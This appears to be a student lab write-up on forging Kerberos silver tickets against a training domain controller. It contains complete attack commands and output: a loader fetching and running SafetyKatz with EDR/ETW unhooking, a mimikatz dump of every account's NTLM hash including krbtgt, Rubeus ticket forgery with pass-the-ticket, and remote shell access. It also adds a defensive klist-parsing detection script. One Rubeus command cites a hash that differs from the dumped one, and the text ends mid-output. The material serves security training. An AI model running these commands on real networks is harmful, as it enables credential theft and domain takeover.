Learning Objective 9
1 – Try to get command execution on the domain controller by creating a silver ticket for:
- HTTP
- WMI
Flag 18 [dcorp-dc] – The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩
From the last task we already have the NTLM hash of the domain controller's machine account (dcorp-dc$):
c:\Users\student98>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98

C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : lsadump::evasive-lsa /patch exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::evasive-lsa /patch
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID  : 00000459 (1113)
User : sqladmin
LM   :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID  : 0000045a (1114)
User : websvc
LM   :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID  : 0000045b (1115)
User : srvadmin
LM   :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID  : 0000045d (1117)
User : appadmin
LM   :
NTLM : d549831a955fee51a43c83efb3928fa7

RID  : 0000045e (1118)
User : svcadmin
LM   :
NTLM : b38ff50264b74508085d82c69794a4d8

RID  : 0000045f (1119)
User : testda
LM   :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID  : 00000460 (1120)
User : mgmtadmin
LM   :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID  : 00000461 (1121)
User : ciadmin
LM   :
NTLM : e08253add90dccf1a208523d02998c3d

RID  : 00000462 (1122)
User : sql1admin
LM   :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID  : 00001055 (4181)
User : studentadmin
LM   :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID  : 000042cd (17101)
User : devopsadmin
LM   :
NTLM : 63abbf0737c59a3142175b1665cd51ee

--snip--

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : 4855e21503a77d55411cb38f183cb60e

RID  : 00000451 (1105)
User : DCORP-ADMINSRV$
LM   :
NTLM : b5f451985fd34d58d5120816d31b5565

RID  : 00000452 (1106)
User : DCORP-APPSRV$
LM   :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID  : 00000453 (1107)
User : DCORP-CI$
LM   :
NTLM : d4500252b22d511864dcb2dee1122192

RID  : 00000454 (1108)
User : DCORP-MGMT$
LM   :
NTLM : 0878da540f45b31b974f73312c18e754

RID  : 00000455 (1109)
User : DCORP-MSSQL$
LM   :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID  : 00000456 (1110)
User : DCORP-SQL1$
LM   :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID  : 0000106a (4202)
User : DCORP-STDADMIN$
LM   :
NTLM : ec8c3d52877e2d67ed092a474b56549e

--snip--

RID  : 0000044f (1103)
User : mcorp$
LM   :
NTLM : fc7226cfc10876ce4a99e15fb079f9a0

RID  : 00000450 (1104)
User : US$
LM   :
NTLM : 193d615216655a7389a50be49ebf1ad6

RID  : 00000458 (1112)
User : ecorp$
LM   :
NTLM : 72d5873b88899140a1727520303af6a0

mimikatz(commandline) # exit
Bye!

C:\Users\svcadmin>
RID : 000003e8 (1000)
User : DCORP-DC$
LM :
NTLM : 4855e21503a77d55411cb38f183cb60e
We can create a Silver Ticket that gives us access to the HTTP service (WinRM) on the DC:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
c:\Users\student98>klist purge
Current LogonId is 0:0x14e3f3c4
Deleting all tickets:
Ticket(s) purged!
c:\Users\student98>klist
Current LogonId is 0:0x14e3f3c4
Cached Tickets: (0)
c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[*] Action: Build TGS
[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 4855E21503A77D55411CB38F183CB60E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 4855E21503A77D55411CB38F183CB60E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : http
[*] Target : dcorp-dc.dollarcorp.moneycorp.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'http/dcorp-dc.dollarcorp.moneycorp.local'
[*] AuthTime : 10/23/2025 5:43:13 AM
[*] StartTime : 10/23/2025 5:43:13 AM
[*] EndTime : 10/23/2025 3:43:13 PM
[*] RenewTill : 10/30/2025 5:43:13 AM
[*] base64(ticket.kirbi):
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
cnAubW9uZXljb3JwLmxvY2Fs
[+] Ticket successfully imported!
c:\Users\student98>klist
Current LogonId is 0:0x14e3f3c4
Cached Tickets: (1)
#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 10/23/2025 5:43:13 (local)
End Time: 10/23/2025 15:43:13 (local)
Renew Time: 10/30/2025 5:43:13 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
c:\Users\student98>
We can confirm that the correct service ticket was imported, either with the built-in klist (output above) or with Rubeus:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist
Either way, the cached ticket is for http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL.
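From the defender's side, the klist listing above carries two tells on the host itself: the ticket's "Kdc Called" field is empty (the ticket was injected into the logon session with /ptt, never requested from a KDC) and its encryption type is RC4-HMAC, because it was forged from an NTLM hash. The following Python script is an added example, not part of the lab writeup: it parses klist output in the format printed above (the sample is constructed from that format, with a normal AES TGT for student98 added for contrast) and flags tickets whose properties are consistent with pass-the-ticket injection.

```python
"""
Heuristic review of `klist` output for service tickets that were injected into
the logon session rather than obtained from a KDC. Added example, not part of the
lab writeup; SAMPLE_KLIST is constructed in the format klist prints on the page.
"""
import re
from dataclasses import dataclass

SAMPLE_KLIST = """\
Current LogonId is 0:0x14e3f3c4

Cached Tickets: (2)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: rpcss/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/23/2025 5:58:42 (local)
        End Time:   10/23/2025 15:58:42 (local)
        Renew Time: 10/30/2025 5:58:42 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

#1>     Client: student98 @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 10/23/2025 5:00:00 (local)
        End Time:   10/23/2025 15:00:00 (local)
        Renew Time: 10/30/2025 5:00:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: dcorp-dc.dollarcorp.moneycorp.local
"""


@dataclass
class Ticket:
    index: int
    client: str
    server: str
    etype: str
    kdc_called: str


_BLOCK_START = re.compile(r"^#(\d+)>", re.MULTILINE)


def parse_klist(text):
    """Split klist output into one Ticket per '#N>' block."""
    starts = list(_BLOCK_START.finditer(text))
    tickets = []
    for i, m in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(text)
        fields = {}
        for line in text[m.start():end].splitlines():
            if line.startswith("#"):
                line = line.split(">", 1)[1]  # drop the '#N>' prefix
            key, sep, value = line.partition(":")
            if sep:  # lines without a colon (e.g. "Ticket Flags ...") are skipped
                fields[key.strip()] = value.strip()
        tickets.append(Ticket(int(m.group(1)), fields.get("Client", ""),
                              fields.get("Server", ""),
                              fields.get("KerbTicket Encryption Type", ""),
                              fields.get("Kdc Called", "")))
    return tickets


def review_tickets(tickets):
    """Return (index, server, reasons) for each ticket that looks injected."""
    # The TGT's client name is the principal the session actually logged on as.
    tgt_clients = {t.client for t in tickets if t.server.lower().startswith("krbtgt/")}
    findings = []
    for t in tickets:
        reasons = []
        if "RC4" in t.etype.upper():
            reasons.append("RC4-HMAC ticket: forged from an NTLM hash or legacy etype")
        if not t.kdc_called:
            reasons.append("Kdc Called is empty: ticket was not requested from a KDC")
        if tgt_clients and t.client not in tgt_clients:
            reasons.append(f"client {t.client!r} differs from the session TGT "
                           f"principal(s) {sorted(tgt_clients)}")
        if reasons:
            findings.append((t.index, t.server, reasons))
    return findings


if __name__ == "__main__":
    for index, server, reasons in review_tickets(parse_klist(SAMPLE_KLIST)):
        print(f"#{index} {server}")
        for r in reasons:
            print(f"    - {r}")
```

Each signal on its own is only a heuristic (RC4 service tickets are still issued in domains that have not disabled RC4, and a session that never needed a KDC shows nothing under Kdc Called), so the script reports the reasons together and leaves the judgement to the analyst. Run it against the output of klist from the session under review, or klist -li <LogonId> for another session.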
Let’s try accessing it using winrs. Note that we are using the FQDN of dcorp-dc, as that is what the service ticket was forged for:
winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
set username
set computername
c:\Users\student98>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

C:\Users\Administrator>
For accessing WMI we need two tickets: one for the HOST service and another for RPCSS.
We run the following commands from an elevated shell:
C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
Verify that the generated tickets are present:
C:\Windows\system32>cd c:\users\student98
c:\Users\student98>klist
Current LogonId is 0:0x14e3f3c4
Cached Tickets: (0)
c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[*] Action: Build TGS
[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 4855E21503A77D55411CB38F183CB60E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 4855E21503A77D55411CB38F183CB60E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : host
[*] Target : dcorp-dc.dollarcorp.moneycorp.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'host/dcorp-dc.dollarcorp.moneycorp.local'
[*] AuthTime : 10/23/2025 5:58:07 AM
[*] StartTime : 10/23/2025 5:58:07 AM
[*] EndTime : 10/23/2025 3:58:07 PM
[*] RenewTill : 10/30/2025 5:58:07 AM
[*] base64(ticket.kirbi):
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
cnAubW9uZXljb3JwLmxvY2Fs
[+] Ticket successfully imported!
c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
